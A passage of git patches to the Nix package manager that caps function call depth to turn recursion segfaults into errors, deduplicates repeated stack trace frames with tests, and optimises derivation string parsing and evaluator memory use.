nix-instantiate --eval --expr '(x: x x) (x: x x)' Segmentation fault: 11 After: $ nix-instantiate --eval --expr '(x: x x) (x: x x)' error: stack overflow at «string»:1:14: 1| (x: x x) (x: x x) | ^ $ nix-instantiate --eval --expr '(x: x x) (x: x x)' --show-trace error: … from call site at «string»:1:1: 1| (x: x x) (x: x x) | ^ … while calling anonymous lambda at «string»:1:2: 1| (x: x x) (x: x x) | ^ … from call site at «string»:1:5: 1| (x: x x) (x: x x) | ^ … while calling anonymous lambda at «string»:1:11: 1| (x: x x) (x: x x) | ^ … from call site at «string»:1:14: 1| (x: x x) (x: x x) | ^ (19997 duplicate traces omitted) error: stack overflow at «string»:1:14: 1| (x: x x) (x: x x) | ^ --- .../rl-next/stack-overflow-segfaults.md | 32 +++++ src/libexpr/eval-settings.hh | 3 + src/libexpr/eval.cc | 18 +++ src/libexpr/eval.hh | 5 + src/libutil/error.cc | 111 +++++++++++++++++- src/libutil/error.hh | 8 ++ .../lang/eval-fail-duplicate-traces.err.exp | 44 +++++++ .../lang/eval-fail-duplicate-traces.nix | 9 ++ ...val-fail-infinite-recursion-lambda.err.exp | 38 ++++++ .../eval-fail-infinite-recursion-lambda.nix | 1 + .../lang/eval-fail-mutual-recursion.err.exp | 57 +++++++++ .../lang/eval-fail-mutual-recursion.nix | 36 ++++++ 12 files changed, 358 insertions(+), 4 deletions(-) create mode 100644 doc/manual/rl-next/stack-overflow-segfaults.md create mode 100644 tests/functional/lang/eval-fail-duplicate-traces.err.exp create mode 100644 tests/functional/lang/eval-fail-duplicate-traces.nix create mode 100644 tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp create mode 100644 tests/functional/lang/eval-fail-infinite-recursion-lambda.nix create mode 100644 tests/functional/lang/eval-fail-mutual-recursion.err.exp create mode 100644 tests/functional/lang/eval-fail-mutual-recursion.nix diff --git a/doc/manual/rl-next/stack-overflow-segfaults.md b/doc/manual/rl-next/stack-overflow-segfaults.md new file mode 100644 index 000000000..3d9753248 --- /dev/null +++ b/doc/manual/rl-next/stack-overflow-segfaults.md @@ -0,0 +1,32 @@ +--- +synopsis: Some stack overflow segfaults are fixed +issues: 9616 +prs: 9617 +--- + +The number of nested function calls has been restricted, to detect and report +infinite function call recursions. The default maximum call depth is 10,000 and +can be set with [the `max-call-depth` +option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). + +This fixes segfaults or the following unhelpful error message in many cases: + + error: stack overflow (possible infinite recursion) + +Before: + +``` +$ nix-instantiate --eval --expr '(x: x x) (x: x x)' +Segmentation fault: 11 +``` + +After: + +``` +$ nix-instantiate --eval --expr '(x: x x) (x: x x)' +error: stack overflow + + at «string»:1:14: + 1| (x: x x) (x: x x) + | ^ +``` diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index ad187ca01..2f6c12d45 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -124,6 +124,9 @@ struct EvalSettings : Config Setting traceVerbose{this, false, "trace-verbose", "Whether `builtins.traceVerbose` should trace its first argument when evaluated."}; + + Setting maxCallDepth{this, 10000, "max-call-depth", + "The maximum function call depth to allow before erroring."}; }; extern EvalSettings evalSettings; diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 810843995..f73e22ba0 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1505,9 +1505,27 @@ void ExprLambda::eval(EvalState & state, Env & env, Value & v) v.mkLambda(&env, this); } +namespace { +/** Increments a count on construction and decrements on destruction. + */ +class CallDepth { + size_t & count; +public: + CallDepth(size_t & count) : count(count) { + ++count; + } + ~CallDepth() { + --count; + } +}; +}; void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & vRes, const PosIdx pos) { + if (callDepth > evalSettings.maxCallDepth) + error("stack overflow; max-call-depth exceeded").atPos(pos).template debugThrow(); + CallDepth _level(callDepth); + auto trace = evalSettings.traceFunctionCalls ? std::make_unique(positions[pos]) : nullptr; diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index da2d256db..7dbffe38c 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -622,6 +622,11 @@ private: const SourcePath & basePath, std::shared_ptr & staticEnv); + /** + * Current Nix call stack depth, used with `max-call-depth` setting to throw stack overflow hopefully before we run out of system stack. + */ + size_t callDepth = 0; + public: /** diff --git a/src/libutil/error.cc b/src/libutil/error.cc index bc0194d59..e42925c2b 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -50,6 +50,32 @@ std::ostream & operator <<(std::ostream & str, const AbstractPos & pos) return str; } +/** + * An arbitrarily defined value comparison for the purpose of using traces in the key of a sorted container. + */ +inline bool operator<(const Trace& lhs, const Trace& rhs) +{ + // `std::shared_ptr` does not have value semantics for its comparison + // functions, so we need to check for nulls and compare the dereferenced + // values here. + if (lhs.pos != rhs.pos) { + if (!lhs.pos) + return true; + if (!rhs.pos) + return false; + if (*lhs.pos != *rhs.pos) + return *lhs.pos < *rhs.pos; + } + // This formats a freshly formatted hint string and then throws it away, which + // shouldn't be much of a problem because it only runs when pos is equal, and this function is + // used for trace printing, which is infrequent. + return std::forward_as_tuple(lhs.hint.str(), lhs.frame) + < std::forward_as_tuple(rhs.hint.str(), rhs.frame); +} +inline bool operator> (const Trace& lhs, const Trace& rhs) { return rhs < lhs; } +inline bool operator<=(const Trace& lhs, const Trace& rhs) { return !(lhs > rhs); } +inline bool operator>=(const Trace& lhs, const Trace& rhs) { return !(lhs < rhs); } + std::optional AbstractPos::getCodeLines() const { if (line == 0) @@ -185,6 +211,69 @@ static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std return hasPos; } +void printTrace( + std::ostream & output, + const std::string_view & indent, + size_t & count, + const Trace & trace) +{ + output << "\n" << "… " << trace.hint.str() << "\n"; + + if (printPosMaybe(output, indent, trace.pos)) + count++; +} + +void printSkippedTracesMaybe( + std::ostream & output, + const std::string_view & indent, + size_t & count, + std::vector & skippedTraces, + std::set tracesSeen) +{ + if (skippedTraces.size() > 0) { + // If we only skipped a few frames, print them out normally; + // messages like "1 duplicate frames omitted" aren't helpful. + if (skippedTraces.size() <= 5) { + for (auto & trace : skippedTraces) { + printTrace(output, indent, count, trace); + } + } else { + output << "\n" << ANSI_WARNING "(" << skippedTraces.size() << " duplicate frames omitted)" ANSI_NORMAL << "\n"; + // Clear the set of "seen" traces after printing a chunk of + // `duplicate frames omitted`. + // + // Consider a mutually recursive stack trace with: + // - 10 entries of A + // - 10 entries of B + // - 10 entries of A + // + // If we don't clear `tracesSeen` here, we would print output like this: + // - 1 entry of A + // - (9 duplicate frames omitted) + // - 1 entry of B + // - (19 duplicate frames omitted) + // + // This would obscure the control flow, which went from A, + // to B, and back to A again. + // + // In contrast, if we do clear `tracesSeen`, the output looks like this: + // - 1 entry of A + // - (9 duplicate frames omitted) + // - 1 entry of B + // - (9 duplicate frames omitted) + // - 1 entry of A + // - (9 duplicate frames omitted) + // + // See: `tests/functional/lang/eval-fail-mutual-recursion.nix` + tracesSeen.clear(); + } + } + // We've either printed each trace in `skippedTraces` normally, or + // printed a chunk of `duplicate frames omitted`. Either way, we've + // processed these traces and can clear them. + skippedTraces.clear(); +} + std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool showTrace) { std::string prefix; @@ -333,7 +422,13 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s bool frameOnly = false; if (!einfo.traces.empty()) { + // Stack traces seen since we last printed a chunk of `duplicate frames + // omitted`. + std::set tracesSeen; + // A consecutive sequence of stack traces that are all in `tracesSeen`. + std::vector skippedTraces; size_t count = 0; + for (const auto & trace : einfo.traces) { if (trace.hint.str().empty()) continue; if (frameOnly && !trace.frame) continue; @@ -343,14 +438,21 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s break; } + if (tracesSeen.count(trace)) { + skippedTraces.push_back(trace); + continue; + } + tracesSeen.insert(trace); + + printSkippedTracesMaybe(oss, ellipsisIndent, count, skippedTraces, tracesSeen); + count++; frameOnly = trace.frame; - oss << "\n" << "… " << trace.hint.str() << "\n"; - - if (printPosMaybe(oss, ellipsisIndent, trace.pos)) - count++; + printTrace(oss, ellipsisIndent, count, trace); } + + printSkippedTracesMaybe(oss, ellipsisIndent, count, skippedTraces, tracesSeen); oss << "\n" << prefix; } @@ -369,4 +471,5 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s return out; } + } diff --git a/src/libutil/error.hh b/src/libutil/error.hh index c04dcbd77..baffca128 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -25,6 +25,7 @@ #include #include #include +#include #include #include @@ -88,6 +89,8 @@ struct AbstractPos std::optional getCodeLines() const; virtual ~AbstractPos() = default; + + inline auto operator<=>(const AbstractPos& rhs) const = default; }; std::ostream & operator << (std::ostream & str, const AbstractPos & pos); @@ -103,6 +106,11 @@ struct Trace { bool frame; }; +inline bool operator<(const Trace& lhs, const Trace& rhs); +inline bool operator> (const Trace& lhs, const Trace& rhs); +inline bool operator<=(const Trace& lhs, const Trace& rhs); +inline bool operator>=(const Trace& lhs, const Trace& rhs); + struct ErrorInfo { Verbosity level; hintformat msg; diff --git a/tests/functional/lang/eval-fail-duplicate-traces.err.exp b/tests/functional/lang/eval-fail-duplicate-traces.err.exp new file mode 100644 index 000000000..32ad9b376 --- /dev/null +++ b/tests/functional/lang/eval-fail-duplicate-traces.err.exp @@ -0,0 +1,44 @@ +error: + … from call site + at /pwd/lang/eval-fail-duplicate-traces.nix:9:3: + 8| in + 9| throwAfter 2 + | ^ + 10| + + … while calling 'throwAfter' + at /pwd/lang/eval-fail-duplicate-traces.nix:4:16: + 3| let + 4| throwAfter = n: + | ^ + 5| if n > 0 + + … from call site + at /pwd/lang/eval-fail-duplicate-traces.nix:6:10: + 5| if n > 0 + 6| then throwAfter (n - 1) + | ^ + 7| else throw "Uh oh!"; + + … while calling 'throwAfter' + at /pwd/lang/eval-fail-duplicate-traces.nix:4:16: + 3| let + 4| throwAfter = n: + | ^ + 5| if n > 0 + + … from call site + at /pwd/lang/eval-fail-duplicate-traces.nix:6:10: + 5| if n > 0 + 6| then throwAfter (n - 1) + | ^ + 7| else throw "Uh oh!"; + + … while calling 'throwAfter' + at /pwd/lang/eval-fail-duplicate-traces.nix:4:16: + 3| let + 4| throwAfter = n: + | ^ + 5| if n > 0 + + error: Uh oh! diff --git a/tests/functional/lang/eval-fail-duplicate-traces.nix b/tests/functional/lang/eval-fail-duplicate-traces.nix new file mode 100644 index 000000000..17ce374ec --- /dev/null +++ b/tests/functional/lang/eval-fail-duplicate-traces.nix @@ -0,0 +1,9 @@ +# Check that we only omit duplicate stack traces when there's a bunch of them. +# Here, there's only a couple duplicate entries, so we output them all. +let + throwAfter = n: + if n > 0 + then throwAfter (n - 1) + else throw "Uh oh!"; +in + throwAfter 2 diff --git a/tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp b/tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp new file mode 100644 index 000000000..5d843d827 --- /dev/null +++ b/tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp @@ -0,0 +1,38 @@ +error: + … from call site + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:1: + 1| (x: x x) (x: x x) + | ^ + 2| + + … while calling anonymous lambda + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:2: + 1| (x: x x) (x: x x) + | ^ + 2| + + … from call site + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:5: + 1| (x: x x) (x: x x) + | ^ + 2| + + … while calling anonymous lambda + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:11: + 1| (x: x x) (x: x x) + | ^ + 2| + + … from call site + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:14: + 1| (x: x x) (x: x x) + | ^ + 2| + + (19997 duplicate frames omitted) + + error: stack overflow; max-call-depth exceeded + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:14: + 1| (x: x x) (x: x x) + | ^ + 2| diff --git a/tests/functional/lang/eval-fail-infinite-recursion-lambda.nix b/tests/functional/lang/eval-fail-infinite-recursion-lambda.nix new file mode 100644 index 000000000..dd0a8bf2e --- /dev/null +++ b/tests/functional/lang/eval-fail-infinite-recursion-lambda.nix @@ -0,0 +1 @@ +(x: x x) (x: x x) diff --git a/tests/functional/lang/eval-fail-mutual-recursion.err.exp b/tests/functional/lang/eval-fail-mutual-recursion.err.exp new file mode 100644 index 000000000..dc2e11766 --- /dev/null +++ b/tests/functional/lang/eval-fail-mutual-recursion.err.exp @@ -0,0 +1,57 @@ +error: + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:36:3: + 35| in + 36| throwAfterA true 10 + | ^ + 37| + + … while calling 'throwAfterA' + at /pwd/lang/eval-fail-mutual-recursion.nix:29:26: + 28| + 29| throwAfterA = recurse: n: + | ^ + 30| if n > 0 + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:31:10: + 30| if n > 0 + 31| then throwAfterA recurse (n - 1) + | ^ + 32| else if recurse + + (19 duplicate frames omitted) + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:33:10: + 32| else if recurse + 33| then throwAfterB true 10 + | ^ + 34| else throw "Uh oh!"; + + … while calling 'throwAfterB' + at /pwd/lang/eval-fail-mutual-recursion.nix:22:26: + 21| let + 22| throwAfterB = recurse: n: + | ^ + 23| if n > 0 + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:24:10: + 23| if n > 0 + 24| then throwAfterB recurse (n - 1) + | ^ + 25| else if recurse + + (19 duplicate frames omitted) + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:26:10: + 25| else if recurse + 26| then throwAfterA false 10 + | ^ + 27| else throw "Uh oh!"; + + (21 duplicate frames omitted) + + error: Uh oh! diff --git a/tests/functional/lang/eval-fail-mutual-recursion.nix b/tests/functional/lang/eval-fail-mutual-recursion.nix new file mode 100644 index 000000000..d090d3158 --- /dev/null +++ b/tests/functional/lang/eval-fail-mutual-recursion.nix @@ -0,0 +1,36 @@ +# Check that stack frame deduplication only affects consecutive intervals, and +# that they are reported independently of any preceding sections, even if +# they're indistinguishable. +# +# In terms of the current implementation, we check that we clear the set of +# "seen frames" after eliding a group of frames. +# +# Suppose we have: +# - 10 frames in a function A +# - 10 frames in a function B +# - 10 frames in a function A +# +# We want to output: +# - a few frames of A (skip the rest) +# - a few frames of B (skip the rest) +# - a few frames of A (skip the rest) +# +# If we implemented this in the naive manner, we'd instead get: +# - a few frames of A (skip the rest) +# - a few frames of B (skip the rest, _and_ skip the remaining frames of A) +let + throwAfterB = recurse: n: + if n > 0 + then throwAfterB recurse (n - 1) + else if recurse + then throwAfterA false 10 + else throw "Uh oh!"; + + throwAfterA = recurse: n: + if n > 0 + then throwAfterA recurse (n - 1) + else if recurse + then throwAfterB true 10 + else throw "Uh oh!"; +in + throwAfterA true 10 From 79d3d412cacd210bc9a0e9ba5407eea67c8e3868 Mon Sep 17 00:00:00 2001 From: pennae Date: Tue, 26 Dec 2023 22:18:42 +0100 Subject: [PATCH 182/654] optimize derivation string parsing MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit a bunch of derivation strings contain no escape sequences. we can optimize for this fact by first scanning for the end of a derivation string and simply returning the contents unmodified if no escape sequences were found. to make this even more efficient we can also use BackedStringViews to avoid copies, avoiding heap allocations for transient data. before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.952 s ± 0.015 s [User: 5.294 s, System: 1.452 s] Range (min … max): 6.926 s … 6.974 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.907 s ± 0.012 s [User: 5.272 s, System: 1.429 s] Range (min … max): 6.893 s … 6.926 s 10 runs --- doc/manual/rl-next/drv-string-parse-hang.md | 6 ++ src/libstore/derivations.cc | 65 +++++++++++++-------- 2 files changed, 48 insertions(+), 23 deletions(-) create mode 100644 doc/manual/rl-next/drv-string-parse-hang.md diff --git a/doc/manual/rl-next/drv-string-parse-hang.md b/doc/manual/rl-next/drv-string-parse-hang.md new file mode 100644 index 000000000..1e041d3e9 --- /dev/null +++ b/doc/manual/rl-next/drv-string-parse-hang.md @@ -0,0 +1,6 @@ +--- +synopsis: Fix handling of truncated `.drv` files. +prs: 9673 +--- + +Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 973ce5211..89d902917 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -2,6 +2,7 @@ #include "downstream-placeholder.hh" #include "store-api.hh" #include "globals.hh" +#include "types.hh" #include "util.hh" #include "split.hh" #include "common-protocol.hh" @@ -186,20 +187,38 @@ static void expect(StringViewStream & str, std::string_view s) /* Read a C-style string from stream `str'. */ -static std::string parseString(StringViewStream & str) +static BackedStringView parseString(StringViewStream & str) { - std::string res; expect(str, "\""); - int c; - while ((c = str.get()) != '"') - if (c == '\\') { - c = str.get(); - if (c == 'n') res += '\n'; - else if (c == 'r') res += '\r'; - else if (c == 't') res += '\t'; - else res += c; + auto c = str.remaining.begin(), end = str.remaining.end(); + bool escaped = false; + for (; c != end && *c != '"'; c++) { + if (*c == '\\') { + c++; + if (c == end) + throw FormatError("unterminated string in derivation"); + escaped = true; } - else res += c; + } + + const auto contentLen = c - str.remaining.begin(); + const auto content = str.remaining.substr(0, contentLen); + str.remaining.remove_prefix(contentLen + 1); + + if (!escaped) + return content; + + std::string res; + res.reserve(content.size()); + for (c = content.begin(), end = content.end(); c != end; c++) + if (*c == '\\') { + c++; + if (*c == 'n') res += '\n'; + else if (*c == 'r') res += '\r'; + else if (*c == 't') res += '\t'; + else res += *c; + } + else res += *c; return res; } @@ -210,7 +229,7 @@ static void validatePath(std::string_view s) { static Path parsePath(StringViewStream & str) { - auto s = parseString(str); + auto s = parseString(str).toOwned(); validatePath(s); return s; } @@ -235,7 +254,7 @@ static StringSet parseStrings(StringViewStream & str, bool arePaths) StringSet res; expect(str, "["); while (!endOfList(str)) - res.insert(arePaths ? parsePath(str) : parseString(str)); + res.insert(arePaths ? parsePath(str) : parseString(str).toOwned()); return res; } @@ -296,7 +315,7 @@ static DerivationOutput parseDerivationOutput( expect(str, ","); const auto hash = parseString(str); expect(str, ")"); - return parseDerivationOutput(store, pathS, hashAlgo, hash, xpSettings); + return parseDerivationOutput(store, *pathS, *hashAlgo, *hash, xpSettings); } /** @@ -344,7 +363,7 @@ static DerivedPathMap::ChildNode parseDerivedPathMapNode( expect(str, ",["); while (!endOfList(str)) { expect(str, "("); - auto outputName = parseString(str); + auto outputName = parseString(str).toOwned(); expect(str, ","); node.childMap.insert_or_assign(outputName, parseDerivedPathMapNode(store, str, version)); expect(str, ")"); @@ -381,12 +400,12 @@ Derivation parseDerivation( case 'r': { expect(str, "rvWithVersion("); auto versionS = parseString(str); - if (versionS == "xp-dyn-drv") { + if (*versionS == "xp-dyn-drv") { // Only verison we have so far version = DerivationATermVersion::DynamicDerivations; xpSettings.require(Xp::DynamicDerivations); } else { - throw FormatError("Unknown derivation ATerm format version '%s'", versionS); + throw FormatError("Unknown derivation ATerm format version '%s'", *versionS); } expect(str, ","); break; @@ -398,7 +417,7 @@ Derivation parseDerivation( /* Parse the list of outputs. */ expect(str, "["); while (!endOfList(str)) { - expect(str, "("); std::string id = parseString(str); + expect(str, "("); std::string id = parseString(str).toOwned(); auto output = parseDerivationOutput(store, str, xpSettings); drv.outputs.emplace(std::move(id), std::move(output)); } @@ -414,19 +433,19 @@ Derivation parseDerivation( } expect(str, ","); drv.inputSrcs = store.parseStorePathSet(parseStrings(str, true)); - expect(str, ","); drv.platform = parseString(str); - expect(str, ","); drv.builder = parseString(str); + expect(str, ","); drv.platform = parseString(str).toOwned(); + expect(str, ","); drv.builder = parseString(str).toOwned(); /* Parse the builder arguments. */ expect(str, ",["); while (!endOfList(str)) - drv.args.push_back(parseString(str)); + drv.args.push_back(parseString(str).toOwned()); /* Parse the environment variables. */ expect(str, ",["); while (!endOfList(str)) { - expect(str, "("); auto name = parseString(str); - expect(str, ","); auto value = parseString(str); + expect(str, "("); auto name = parseString(str).toOwned(); + expect(str, ","); auto value = parseString(str).toOwned(); expect(str, ")"); drv.env[name] = value; } From 02c64abf1e892220cb62ce3b7e1598030fb6a61c Mon Sep 17 00:00:00 2001 From: pennae Date: Tue, 26 Dec 2023 05:44:52 +0100 Subject: [PATCH 183/654] use translation table for drv string parsing MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit the table is very small compared to cache sizes and a single indexed load is faster than three comparisons. before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.907 s ± 0.012 s [User: 5.272 s, System: 1.429 s] Range (min … max): 6.893 s … 6.926 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.883 s ± 0.016 s [User: 5.250 s, System: 1.424 s] Range (min … max): 6.860 s … 6.905 s 10 runs --- src/libstore/derivations.cc | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 89d902917..89a345057 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -174,6 +174,17 @@ struct StringViewStream { return c; } }; + +constexpr struct Escapes { + char map[256]; + constexpr Escapes() { + for (int i = 0; i < 256; i++) map[i] = (char) (unsigned char) i; + map[(int) (unsigned char) 'n'] = '\n'; + map[(int) (unsigned char) 'r'] = '\r'; + map[(int) (unsigned char) 't'] = '\t'; + } + char operator[](char c) const { return map[(unsigned char) c]; } +} escapes; } @@ -213,10 +224,7 @@ static BackedStringView parseString(StringViewStream & str) for (c = content.begin(), end = content.end(); c != end; c++) if (*c == '\\') { c++; - if (*c == 'n') res += '\n'; - else if (*c == 'r') res += '\r'; - else if (*c == 't') res += '\t'; - else res += *c; + res += escapes[*c]; } else res += *c; return res; From c62686a95bd3ebbf3f5104c27222e751e84b84a3 Mon Sep 17 00:00:00 2001 From: pennae Date: Wed, 27 Dec 2023 04:26:50 +0100 Subject: [PATCH 184/654] reduce copies during drv parsing MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit many paths need not be heap-allocated, and derivation env name/valye pairs can be moved into the map. before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.883 s ± 0.016 s [User: 5.250 s, System: 1.424 s] Range (min … max): 6.860 s … 6.905 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.868 s ± 0.027 s [User: 5.194 s, System: 1.466 s] Range (min … max): 6.828 s … 6.913 s 10 runs --- src/libstore/derivations.cc | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 89a345057..2fafcb8e7 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -235,10 +235,10 @@ static void validatePath(std::string_view s) { throw FormatError("bad path '%1%' in derivation", s); } -static Path parsePath(StringViewStream & str) +static BackedStringView parsePath(StringViewStream & str) { - auto s = parseString(str).toOwned(); - validatePath(s); + auto s = parseString(str); + validatePath(*s); return s; } @@ -262,7 +262,7 @@ static StringSet parseStrings(StringViewStream & str, bool arePaths) StringSet res; expect(str, "["); while (!endOfList(str)) - res.insert(arePaths ? parsePath(str) : parseString(str).toOwned()); + res.insert((arePaths ? parsePath(str) : parseString(str)).toOwned()); return res; } @@ -434,9 +434,9 @@ Derivation parseDerivation( expect(str, ",["); while (!endOfList(str)) { expect(str, "("); - Path drvPath = parsePath(str); + auto drvPath = parsePath(str); expect(str, ","); - drv.inputDrvs.map.insert_or_assign(store.parseStorePath(drvPath), parseDerivedPathMapNode(store, str, version)); + drv.inputDrvs.map.insert_or_assign(store.parseStorePath(*drvPath), parseDerivedPathMapNode(store, str, version)); expect(str, ")"); } @@ -455,7 +455,7 @@ Derivation parseDerivation( expect(str, "("); auto name = parseString(str).toOwned(); expect(str, ","); auto value = parseString(str).toOwned(); expect(str, ")"); - drv.env[name] = value; + drv.env.insert_or_assign(std::move(name), std::move(value)); } expect(str, ")"); From 1fe66852ff87e98615f35e8aac64675ff988fb5a Mon Sep 17 00:00:00 2001 From: pennae Date: Fri, 22 Dec 2023 18:19:53 +0100 Subject: [PATCH 185/654] reduce the size of Env by one pointer MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit since `up` and `values` are both pointer-aligned the type field will also be pointer-aligned, wasting 48 bits of space on most machines. we can get away with removing the type field altogether by encoding some information into the `with` expr that created the env to begin with, reducing the GC load for the absolutely massive amount of single-entry envs we create for lambdas. this reduces memory usage of system eval by quite a bit (reducing heap size of our system eval from 8.4GB to 8.23GB) and gives similar savings in eval time. running `nix eval --raw --impure --expr 'with import {}; system'` before: Time (mean ± σ): 5.576 s ± 0.003 s [User: 5.197 s, System: 0.378 s] Range (min … max): 5.572 s … 5.581 s 10 runs after: Time (mean ± σ): 5.408 s ± 0.002 s [User: 5.019 s, System: 0.388 s] Range (min … max): 5.405 s … 5.411 s 10 runs --- doc/manual/rl-next/env-size-reduction.md | 7 +++++ doc/manual/rl-next/with-error-reporting.md | 31 ++++++++++++++++++++++ src/libcmd/repl.cc | 2 +- src/libexpr/eval-inline.hh | 2 -- src/libexpr/eval.cc | 29 ++++++++++---------- src/libexpr/eval.hh | 5 ---- src/libexpr/nixexpr.cc | 18 ++++++++----- src/libexpr/nixexpr.hh | 13 ++++++--- src/libexpr/primops.cc | 2 +- 9 files changed, 75 insertions(+), 34 deletions(-) create mode 100644 doc/manual/rl-next/env-size-reduction.md create mode 100644 doc/manual/rl-next/with-error-reporting.md diff --git a/doc/manual/rl-next/env-size-reduction.md b/doc/manual/rl-next/env-size-reduction.md new file mode 100644 index 000000000..40a58bc28 --- /dev/null +++ b/doc/manual/rl-next/env-size-reduction.md @@ -0,0 +1,7 @@ +--- +synopsis: Reduce eval memory usage and wall time +prs: 9658 +--- + +Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. +This reduces memory usage during eval by around 2% and wall time by around 3%. diff --git a/doc/manual/rl-next/with-error-reporting.md b/doc/manual/rl-next/with-error-reporting.md new file mode 100644 index 000000000..10b020956 --- /dev/null +++ b/doc/manual/rl-next/with-error-reporting.md @@ -0,0 +1,31 @@ +--- +synopsis: Better error reporting for `with` expressions +prs: 9658 +--- + +`with` expressions using non-attrset values to resolve variables are now reported with proper positions. + +Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: + +``` +nix-repl> with 1; a +error: + … + + at «none»:0: (source not available) + + error: value is an integer while a set was expected +``` + +Now position information is preserved and reported as with most other errors: + +``` +nix-repl> with 1; a +error: + … while evaluating the first subexpression of a with expression + at «string»:1:1: + 1| with 1; a + | ^ + + error: value is an integer while a set was expected +``` diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 97d709ff4..dea91ba63 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -112,7 +112,7 @@ NixRepl::NixRepl(const SearchPath & searchPath, nix::ref store, refstaticBaseEnv.get())) + , staticEnv(new StaticEnv(nullptr, state->staticBaseEnv.get())) , historyFile(getDataDir() + "/nix/repl-history") { } diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 52aa75b5f..f7710f819 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -73,8 +73,6 @@ Env & EvalState::allocEnv(size_t size) #endif env = (Env *) allocBytes(sizeof(Env) + size * sizeof(Value *)); - env->type = Env::Plain; - /* We assume that env->values has been cleared by the allocator; maybeThunk() and lookupVar fromWith expect this. */ return *env; diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 810843995..ee1a87d9a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -543,7 +543,7 @@ EvalState::EvalState( , env1AllocCache(std::allocate_shared(traceable_allocator(), nullptr)) #endif , baseEnv(allocEnv(128)) - , staticBaseEnv{std::make_shared(false, nullptr)} + , staticBaseEnv{std::make_shared(nullptr, nullptr)} { corepkgsFS->setPathDisplay(""); internalFS->setPathDisplay("«nix-internal»", ""); @@ -781,7 +781,7 @@ void printStaticEnvBindings(const SymbolTable & st, const StaticEnv & se) // just for the current level of Env, not the whole chain. void printWithBindings(const SymbolTable & st, const Env & env) { - if (env.type == Env::HasWithAttrs) { + if (!env.values[0]->isThunk()) { std::cout << "with: "; std::cout << ANSI_MAGENTA; Bindings::iterator j = env.values[0]->attrs->begin(); @@ -835,7 +835,7 @@ void mapStaticEnvBindings(const SymbolTable & st, const StaticEnv & se, const En if (env.up && se.up) { mapStaticEnvBindings(st, *se.up, *env.up, vm); - if (env.type == Env::HasWithAttrs) { + if (!env.values[0]->isThunk()) { // add 'with' bindings. Bindings::iterator j = env.values[0]->attrs->begin(); while (j != env.values[0]->attrs->end()) { @@ -973,22 +973,23 @@ inline Value * EvalState::lookupVar(Env * env, const ExprVar & var, bool noEval) if (!var.fromWith) return env->values[var.displ]; + // This early exit defeats the `maybeThunk` optimization for variables from `with`, + // The added complexity of handling this appears to be similarly in cost, or + // the cases where applicable were insignificant in the first place. + if (noEval) return nullptr; + + auto * fromWith = var.fromWith; while (1) { - if (env->type == Env::HasWithExpr) { - if (noEval) return 0; - Value * v = allocValue(); - 